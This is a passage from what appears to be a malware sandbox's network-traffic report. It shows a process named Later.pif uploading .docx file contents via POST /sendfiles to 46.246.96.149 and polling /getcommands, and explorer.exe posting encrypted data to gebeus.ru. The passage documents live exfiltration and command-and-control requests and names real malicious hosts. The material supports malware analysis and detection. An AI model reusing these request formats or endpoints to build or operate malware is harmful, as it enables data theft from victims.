JCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQO [TRUNCATED]
Jul 15, 2024 06:13:29.547022104 CEST	6	OUT	Data Raw: 9c 5d ab 52 04 Data Ascii: ]R
Jul 15, 2024 06:13:30.252144098 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:30 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=r68d96c3vgp6dk5ft2shd9hqd1; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49753	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:30.403887033 CEST	1236	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1129 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=MQAWXUYAIK.docx<AND>file=MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBET [TRUNCATED]
Jul 15, 2024 06:13:30.403887033 CEST	6	OUT	Data Raw: 9c 5d ab 52 Data Ascii: ]R
Jul 15, 2024 06:13:31.135555029 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:31 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=aqkvpmvofl90sigf8va5e9jjco; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49754	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:31.409737110 CEST	1236	OUT	POST /sendfiles HTTP/1.1 Content-Type: application/octet-stream Host: 46.246.96.149 Content-Length: 1129 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 [TRUNCATED] Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=XQACHMZIHU.docx<AND>file=XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLA [TRUNCATED]
Jul 15, 2024 06:13:31.409737110 CEST	6	OUT	Data Raw: 9d aa ab 52 Data Ascii: R
Jul 15, 2024 06:13:32.240799904 CEST	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:32 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=umi59gv22k1jktl5lvi1so22ak; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49755	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:32.372627020 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=1
Jul 15, 2024 06:13:33.062006950 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:32 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=fg0dvaul0v87u23kirggpdte1l; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49756	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:33.184720039 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=2
Jul 15, 2024 06:13:33.875711918 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:33 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=6svegl45hdc4mc1fcuhl39mrnk; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49757	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:33.993194103 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=3
Jul 15, 2024 06:13:34.700542927 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:34 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=r1sn0hhctt3q1gagq4k0t0jle2; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49758	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:34.450016022 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://woemrmcgjefexq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: gebeus.ru
Jul 15, 2024 06:13:34.450048923 CEST	338	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5f 03 e5 e1 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu_P_^\1<KE\\|v>}hcQAHkX)To@;41f3.3H?uQq1VM?#Nb@h1nVlFM
Jul 15, 2024 06:13:35.504586935 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49759	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:34.830212116 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=4
Jul 15, 2024 06:13:35.526278973 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:35 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=01j9v1rmhml8b8hv7g7ec6m0fk; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49760	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:35.648220062 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=5
Jul 15, 2024 06:13:36.338210106 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:36 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=km3amad7kigdcm3tr71s7kqoia; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49761	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:36.461169004 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=6
Jul 15, 2024 06:13:37.280277967 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=1vgicjbfktp49vcjkmb2s76om8; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49762	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:37.401891947 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=7
Jul 15, 2024 06:13:38.115818024 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:38 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=o0jvpd8cmhasg5iqtl98alpiet; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49763	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:38.228734016 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=8
Jul 15, 2024 06:13:38.917354107 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:38 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ap2470ikorktc07tk7ig9g0744; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49764	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:39.039186954 CEST	178	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=9
Jul 15, 2024 06:13:39.754393101 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=0mgiiml9l94eaj90344d7l1gh3; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49765	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:39.810580015 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wkabmnjjuon.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 184 Host: gebeus.ru
Jul 15, 2024 06:13:39.810616016 CEST	184	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 06 c4 96 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu'T8\|Dy1\|(wt%J@uzdCO+)7A)7E:x/y9</Ff
Jul 15, 2024 06:13:40.900899887 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49766	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:39.870352030 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=10
Jul 15, 2024 06:13:40.563427925 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:40 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=j1lmt8335e6cgaevakjnll3v2q; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49767	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:40.685163021 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=11
Jul 15, 2024 06:13:41.379894018 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:41 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=gpnv39s5mpuqemf5qhth9vkrjd; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49768	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:41.520900965 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=12
